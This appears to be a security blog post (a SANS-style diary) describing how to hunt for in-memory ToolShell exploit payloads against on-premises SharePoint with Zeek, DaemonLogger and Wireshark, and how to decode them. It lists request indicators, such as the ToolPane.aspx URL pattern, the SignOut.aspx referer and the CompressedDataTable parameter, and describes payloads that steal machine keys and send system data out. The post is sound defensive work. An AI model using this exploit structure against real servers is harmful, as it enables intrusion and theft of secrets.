In July 2025, many of us were introduced to the Microsoft SharePoint exploit chain known as ToolShell. ToolShell exploits the deserialization and authentication bypass vulnerabilities, CVE-2025-53770 [2] and CVE-2025-53771 [3], in on-premises SharePoint Server 2016, 2019, and Subscription editions. When the exploit chain was initially introduced, threat actors used payloads that attempted to upload web shells to a SharePoint server’s file system. The problem for threat actors was that the uploaded web shells were easily detectable by most Endpoint Detection and Response (EDR) solutions. So the threat actors upped the game and reworked their payloads to execute in-memory. This new technique made it more difficult for defenders to detect the execution of these new payloads [4].

Many articles have been written on the technical details of the ToolShell vulnerabilities, so I won’t go into an in-depth analysis here. If you want an in-depth analysis, check out the Securelist article, ToolShell: a story of five vulnerabilities in Microsoft SharePoint [5]. What I will present to you in this post is a process using Zeek Network Security Monitor, DaemonLogger, and Wireshark to hunt for in-memory ToolShell exploit payloads and how to decode them for further analysis.

Review Zeek Logs

The first step in the hunt is to review the HTTP requests to our SharePoint server. We will do this by reviewing our Zeek http logs and looking for POST requests that contain the following indicators of a malicious request:

• URLs:
  • /_layouts/15/ToolPane.aspx/<random>?DisplayMode=Edit&<random>=/ToolPane.aspx
  • /_layouts/16/ToolPane.aspx/<random>?DisplayMode=Edit&<random>=/ToolPane.aspx
• Referer headers:
  • /_layouts/SignOut.aspx
  • /_layouts/./SignOut.aspx
• Request Body:
  • Length greater than 0

Zeek log files are rotated and compressed daily. To review the compressed log files over multiple days we use a combination of two tools, zcat and zcutter.py [6]. From the /opt/zeek/logs directory we run the following commands to search all Zeek http logs for August 2025.

zcat 2025-08**/http*.log.gz | ~/bin/zcutter.py -d ts id.orig_h id.resp_p host method uri user_agent request_body_len | grep ToolPane | grep -v "\"request_body_len\": 0}"

Reviewing the returned http logs entries, we see many matching the indicators of a malicious request. We will focus on the highlighted entries from August 24, 2025.

Figure 1: Zeek http.log file matching indicators of a malicious request.

 

Prepare PCAP Files

Now that we have identified potential http requests to analyze further, our next step in the hunt will be to prepare our PCAP files for packet analysis. For this scenario we are using DaemonLogger to capture packets [7]. Each day DaemonLogger creates two PCAP files.

 

Figure 2: DaemonLogger PCAP files from October 31, 2025.

 

We will need to merge the two PCAP files to ensure we are analyzing all packets that were captured for the day in question. To do this we will use the tool mergecap from Wireshark [8]. The following command will merge the two PCAP files that we identified in Figure 2 above into a new file named 2025-08-24.pcap.

./mergecap ~/pcaps/daemonlogger.pcap.* -w ~/pcaps/2025-08-24.pcap

 

Figure 3: Mergecap command and resulting merged PCAP file.

 

Packet Analysis with Wireshark

We will now analyze the newly created PCAP file using Wireshark. With the following filter we can limit the packets displayed to only those packets containing POST requests to the URL /_layouts/15/ToolPane.aspx.

Filter: _ws.col.info matches "POST /_layouts/15/ToolPane.aspx"

 

Figure 4: Wireshark displaying packets containing POST requests to the URL /_layouts/15/ToolPane.aspx.

 

Analyzing the packet with the timestamp 2025-08-24T04:22:33, we see an HTTP POST request to the URL /_layouts/15/toolpane.aspx/lx?DisplayMode=Edit&lx=/ToolPane.aspx and a Referer header of /_layouts/./SignOut.aspx. The analysis also shows a URL encoded payload being sent via the MSOtlPn_DWP parameter. The parameter contains a property named CompressedDataTable that in turn contains a malicious payload that attempts to exploit the SharePoint deserialization vulnerability.

 

Figure 5: Wireshark HTTP Stream showing malicious POST request

 

Deserialization Vulnerability Payload Analysis

Our hunt is almost complete. Now it is time to decode the malicious deserialization payload to see what it contains. With the Wireshark HTTP Stream window still open, copy the CompressedDataTable property and save to a file named property-encoded.txt. This will include everything between CompressedDataTable%3D%22 and %22+DataTable-CaseSensitive. The property usually starts with the characters H4sI.

 

Figure 6: Wireshark HTTP Stream highlighting the beginning of the CompressedDataTable property.

 

With the CompressedDataTable property copied to a file we can decode the property using the commands below and output the results to the file property-decoded.txt.

cat property-encoded.txt | python3 -c "import sys, urllib.parse as ul; print(ul.unquote_plus(sys.stdin.read().strip()))" | base64 -d | zcat > property-decoded.txt

 

Figure 7: Decoded view of the CompressedDataTable property with the encoded malicious payload.

 

One more copy and decode and we will have our malicious in-memory payload. Open the property-decoded.txt file created in the step above. Copy the MethodParameter string to a new file named method-encoded.txt. The beginning of the string is highlighted in Figure 7 above. We will then run the following commands to decode the method.

cat method-encoded.txt | base64 -d > method-decoded.txt

Once our payload is decoded, we see that it contains a known malicious .NET Dynamiclink Library (DLL) binary named osvmhdfl.dll. If this in-memory payload was executed successfully on a vulnerable SharePoint server, it could extract machine keys and other system information and return the information in the HTTP response [9].

 

Figure 8: Partially decoded method containing a malicious payload.

 

Additional Payloads Discovered

Using this process, I have discovered security scanner payloads and payloads containing encoded PowerShell commands.

Nuclei Scanner Template CVE-2025-53770

The Project Discovery Nuclei Scanner, when using the http template CVE-2025-53770, sends the payload in Figure 9. This payload contains the .NET Dynamic-link Library (DLL) binary named jlaneafi.dll. If the SharePoint server is vulnerable, an additional HTTP response header of X-Nuclei is returned with a value of CVE-2025-53770 [10].

 

Figure 9: Partially decoded method containing a Nuclei Scanner template CVE-2025-53770 payload.

 

Encoded PowerShell Commands

I have seen variations of the payload in Figure 10 that contain encoded PowerShell commands.

 

Figure 10: Partially decoded method containing an encoded PowerShell payload.

 

Decoding the EncodedCommand value exposes the PowerShell command in Figure 11 below. If this PowerShell executed successfully it could extract system information and send that information to the threat actor’s server on port 40443.

 

Figure 11: Decoded PowerShell command.

 

Conclusion

We have completed our hunt, found our in-memory ToolShell exploit payload, and have seen additional payloads found in the wild. Use this process to hunt for payloads in your own environment and discover what new techniques threat actors are attempting against on-premise SharePoint servers vulnerable to the ToolShell exploit chain.

 

References

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-53770
[3] https://nvd.nist.gov/vuln/detail/CVE-2025-53771
[4] https://www.recordedfuture.com/blog/toolshell-exploit-chain-thousands-sharepointservers-risk
[5] https://securelist.com/toolshell-explained/117045/
[6] https://www.activecountermeasures.com/zcutter-more-flexible-zeek-log-processing/
[7] https://github.com/Cisco-Talos/Daemonlogger
[8] https://www.wireshark.org/docs/wsug_html_chunked/AppToolsmergecap.html
[9] https://www.cisa.gov/sites/default/files/2025-08/MAR-251132.c1.v1.CLEAR_.pdf
[10] https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-53770.yaml

 

--
Jesse La Grew
Handler